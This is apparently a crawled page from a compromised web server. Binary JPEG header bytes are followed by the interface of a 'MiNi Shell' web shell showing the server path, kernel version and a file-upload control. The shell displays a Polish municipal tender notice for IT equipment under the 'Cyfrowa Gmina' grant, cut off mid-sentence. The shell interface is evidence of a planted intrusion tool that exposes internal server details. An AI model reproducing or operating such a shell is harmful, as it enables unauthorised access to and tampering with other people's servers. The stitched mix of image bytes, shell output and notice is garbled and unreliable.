JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230407/0017017001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa sprzętu i oprogramowania informatycznego w ramach projektu grantowego „Cyfrowa Gmina” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GÓRNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010079</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Łysicka 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Górno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-008</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@gorno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gorno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa sprzętu i oprogramowania informatycznego w ramach projektu grantowego „Cyfrowa Gmina” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5530db14-d56d-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00170170</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00048371/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Cyfrowa Gmina</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiot zamówienia, jest finansowany ze środków Programu Operacyjnego Polska Cyfrowa na lata 2014 – 2020, Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenie REACT – EU, działania 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia w ramach projektu grantowego „Cyfrowa Gmina” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminagorno.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminagorno.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej.<br/>2.W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji:<br/>2.1.	Elektronicznie na adres e-mail: gmina@gorno.pl lub za pośrednictwem Platformy znajdującej się pod adresem: https://gminagorno.ezamawiajacy.pl w zakładce „Korespondencja”.<br/>3.	Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wpływu na Platformę.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Górno, ul. Łysicka 13, 26-008 Górno, tel. kontaktowy 41/3023018 mail.: gmina@gorno.pl .<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem e-mail: inspektor@cbi24.pl <br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. <br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 ze zm.), zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami PZP.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z PZP. <br/>8. Osoba, której dane dotyczą ma prawo do:<br/> - dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania, <br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych. <br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z PZP.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.<br/>14. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust. 1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu, Administrator nie udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 Rozporządzenia.<br/>15. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 Rozporządzenia, nie może naruszać integralności protokołu oraz jego załączników.<br/>16. Ponadto informujemy, iż w związku z przetwarzaniem Pani/Pana danych osobowych nie podlega Pan/Pani decyzjom, które się opierają wyłącznie na zautomatyzowanym przetwarzaniu, w tym profilowaniu, o czym stanowi art. 22 Rozporządzenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.1.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest Zakup, dostawa i montaż sprzętu i oprogramowania informatycznego w ramach projektu grantowego „Cyfrowa Gmina”, wraz z wszelkimi kosztami, jakie poniesie Wykonawca z tytułu należytej realizacji przedmiotu zamówienia, a w szczególności z kosztami: dostarczenia, załadunku, rozładunku, montażu, wypakowania sprzętu i sprawdzenia funkcjonalności sprzętu (pierwsze uruchomienie - jeżeli wymagane), gwarancją jakości na dostarczony towar (wraz z dostawą Wykonawca przedłoży karty gwarancyjne) w podziale na części:<br/>CZĘŚĆ I - Zakup i dostawa sprzętu i oprogramowania informatycznego<br/>- 35 sztuk zestawów komputerowych,<br/>- 35 sztuk monitorów,<br/>- 35 sztuk oprogramowania biurowego,<br/>- serwer plików,<br/>- serwer,<br/>- zasilacz awaryjny UPS,<br/>- dysk twardy 2 TB,<br/>- brama dostępowa UTM <br/>- system kontroli dostępu typu NAC,<br/>1.1. Zakres zamówienia obejmuje:<br/>a) dostawę wyposażenia i urządzeń do miejsca montażu,<br/>b) ich montaż i rozmieszczenie w miejscu użytkowania, <br/>c) uruchomienie (podłączenie i wykonanie prób rozruchowych – jeżeli wymagane) i przekazanie wyposażenia do odbioru,<br/>d) konfigurację i instalację dostarczanego oprogramowania,<br/>e) wsparcie techniczne i opiekuna przez minimum okres zaoferowanej gwarancji i rękojmi,<br/>f) migrację oprogramowania z obecnych serwerów na dostarczane,<br/>g) integrację dostarczanych urządzeń i oprogramowania z istniejącą infrastrukturą programowo-sprzętową u Zamawiającego.<br/>1.2. Dostawa i montaż wyposażenia stanowiąca przedmiot niniejszego zamówienia odbędzie się na ryzyko i koszt Wykonawcy.<br/>1.3. Minimalny okres na jaki Wykonawca udzieli gwarancji jakości oraz rękojmi na dostarczony przedmiot zamówienia wynosi 24 miesiące.<br/>1.4. Wyposażenie stanowiące przedmiot zamówienia musi:<br/>a)	posiadać właściwe atesty, deklaracje zgodności, świadectwa jakości i dopuszczenia oraz inne dokumenty potwierdzające, że spełnia wszelkie normy i wymagania dla niego przewidziane prawem, <br/>b)	odpowiadać wymaganiom określonym w niniejszej SWZ,<br/>c)	być produktem bezpiecznym w rozumieniu ustawy z dnia 12.12.2003 r. o ogólnym bezpieczeństwie produktów (t.j. Dz.U. z 2003 r. Nr 229, poz. 2275.) wraz z aktami wykonawczymi,<br/>d)	jako przedmiot umowy przeznaczony do wyposażenia w placówce oświatowej, musi spełniać prawem przewidziane wymagania dla wyrobów stosowanych w placówkach oświatowych.<br/>1.5. Szczegółowy opis przedmiotu zamówienia, w podziale na części zawarto w załączniku nr 7. (7.1 do 7.3)<br/>1.6. Zamawiający nie wymaga dokonania wizji lokalnej.<br/>1.7. Jeżeli w jakimkolwiek miejscu SWZ i załącznikach do SWZ zostały wskazane do opisu asortymentu znaki towarowe lub pochodzenie – wszędzie tam Zamawiający dodaje wyrażenia „typu” / „równoważne”, co oznacza, że oferowany asortyment ma posiadać parametry (techniczne, jakościowe, funkcjonalne oraz użytkowe) takie same lub lepsze od opisanych. Podane w opisie przedmiotu zamówienia mają za zadanie jedynie sprecyzowanie wymagań jakościowych i są podane jako przykładowe.<br/>2. Zamawiający dopuszcza możliwość zmiany wielkości zamówienia (zwiększenie / zmniejszenie) o poszczególne elementy zamówienia podstawowego.<br/>3. Numeracja wskazana w zaproszeniu ofertowym oraz załącznikach jest zastosowana celem ułatwienia identyfikacji ponoszonych wydatków.<br/>4. Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 7, który należy wypełnić (wskazać nazwy i oferowane parametry techniczne, funkcjonalne, oprogramowanie) i dostarczyć przed podpisaniem umowy. Zamawiający wymaga od Wykonawców składających oferty, oprócz potwierdzenia ogólnym oświadczeniem jej zgodności z zaproszeniem ofertowym, konkretyzacji przedmiotu oferty przez wskazanie konkretnych oferowanych rozwiązań i wymaganych dokumentów.<br/>5. Przedmiot zamówienia należy wykonać zgodnie z warunkami postępowania. Dostarczane materiały, urządzenia powinny być fabrycznie nowe, nie używane i obejmować wszystkie pozycje wyszczególnione w załączniku od nr 7 w pełnym podanym zakresie, z uwzględnieniem wszystkich określonych w tym dokumencie wymagań.<br/>6. Dostawa poszczególnych egzemplarzy sprzętu nastąpi na koszt własny Wykonawcy, w opakowaniu firmowym producenta, odpowiadającym właściwościom sprzętu, zapewniającym jego całość i nienaruszalność.<br/>7. Sposób realizacji przedmiotu zamówienia:<br/>7.1 Wszystkie urządzenia mają być dostarczone w miejsce wskazane przez Zamawiającego – budynki administracyjne Urzędu Gminy Górno, podłączone i uruchomione. <br/>7.2 Do każdego dostarczonego urządzenia Wykonawca winny jest dostarczyć minimum:<br/>- kompletne opakowanie i zabezpieczenia<br/>- pisemną gwarancję<br/>- instrukcję obsługi w języku polskim <br/>- inne dokumenty potwierdzające zgodność dostarczonego asortymentu z wymaganiami Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33195100-4 - Monitory</p> <p class="mb-0">48820000-2 - Serwery</p> <p class="mb-0">72511000-0 - Usługi zarządzania oprogramowaniem sieciowym</p> <p class="mb-0">30236000-2 - Różny sprzęt komputerowy</p> <p class="mb-0">48218000-9 - Pakiety oprogramowania zarządzającego licencjami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny oferty:<br/>a) dla części I<br/>1.1. Cena ofertowa brutto (C) – waga kryterium 60 pkt<br/>1.2. Okres gwarancji i rękojmi (G) – waga kryterium 30 pkt<br/>1.3. Serwis oraz pomoc techniczna (S) – waga kryterium 10 pkt<br/>b) dla części II<br/>1.1. Cena ofertowa brutto (C) – waga kryterium 60 pkt<br/>1.3. Serwis oraz pomoc techniczna (S) – waga kryterium 40 pkt<br/>c) dla części III<br/>1.1. Cena ofertowa brutto (C) – waga kryterium 60 pkt<br/>1.3. Serwis oraz pomoc techniczna (S) – waga kryterium 40 pkt<br/>2. Zasady oceny oferty w poszczególnych kryteriach:<br/>2.1. Cena ofertowa brutto (C)<br/>Liczba punktów = Cn/Cb x 60<br/>gdzie:<br/>- Cn – najniższa cena spośród wszystkich ofert nie odrzuconych<br/>- Cb – cena oferty badanej<br/>- 60 - wskaźnik stały<br/>2.2 Kryterium okresu gwarancji i rękojmi (G) będzie oceniane na podstawie okresu podanego w formularzu ofertowym i przeliczane wg następującej punktacji:<br/>Wymagany okres gwarancji (24 miesiące) – 0 pkt<br/>Wymagany okres gwarancji zwiększony o 6 miesięcy – 15 pkt<br/>Wymagany okres gwarancji zwiększony o 12 miesięcy – 30 pkt<br/>2.3 Kryterium serwisu (S) będzie oceniane na podstawie okresu podanego w formularzu ofertowym i przeliczane wg następującej punktacji:<br/>a) pomoc techniczna: <br/>- całodobowa (10 pkt / 2,5 pkt dla części I)<br/>- w godz. 8:00 – 18:00 – min. 8 godz. w podanym przedziale (5 pkt / 1,5 pkt dla części I)<br/>- wskazany telefon kontaktowy oraz e-mail obsługiwany w dni robocze – wymóg minimalny, niepunktowany<br/>b) opiekun klienta <br/>- indywidualny opiekun klienta (10 pkt / 2,5 pkt dla części I)<br/>- regionalny opiekun klienta (5 pkt / 1,5 pkt dla części I)<br/>- infolinia czynna w dni robocze w godzinach pracy firmy – wymóg minimalny, niepunktowany<br/>c) serwis u klienta<br/>- serwis u klienta do 4 godz. od zgłoszenia (10 pkt / 2,5 pkt dla części I)<br/>- serwis u klienta najpóźniej następnego dnia roboczego od zgłoszenia (5 pkt / 1,5 pkt dla części I)<br/>- serwis u klienta najpóźniej do 3 dni roboczych od zgłoszenia – wymóg minimalny, niepunktowany<br/>d) pomoc zdalna<br/>- kontakt opiekuna wraz z rozwiązaniem zgłoszonego problemu do 1 godz. od zgłoszenia (10 pkt / 2,5 pkt dla części I)<br/>- kontakt opiekuna wraz z rozwiązaniem zgłoszonego problemu do 4 godz. od zgłoszenia (5 pkt / 1,5 pkt dla części I)<br/>- kontakt opiekuna wraz z rozwiązaniem zgłoszonego problemu najpóźniej następnego dnia roboczego od zgłoszenia – wymóg minimalny, niepunktowany<br/>3. Punktacja przyznana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada zasadom określonym w ustawie Pzp, spełnia wszystkie wymagania określone w niniejszej SWZ oraz została oceniona jako najkorzystniejsza w oparciu o podane wyżej kryteria oceny oferty z uwzględnieniem ofert częściowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Serwis oraz pomoc techniczna (S)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest Zakup, dostawa i montaż sprzętu i oprogramowania informatycznego w ramach projektu grantowego „Cyfrowa Gmina”, wraz z wszelkimi kosztami, jakie poniesie Wykonawca z tytułu należytej realizacji przedmiotu zamówienia, a w szczególności z kosztami: dostarczenia, załadunku, rozładunku, montażu, wypakowania sprzętu i sprawdzenia funkcjonalności sprzętu (pierwsze uruchomienie - jeżeli wymagane), gwarancją jakości 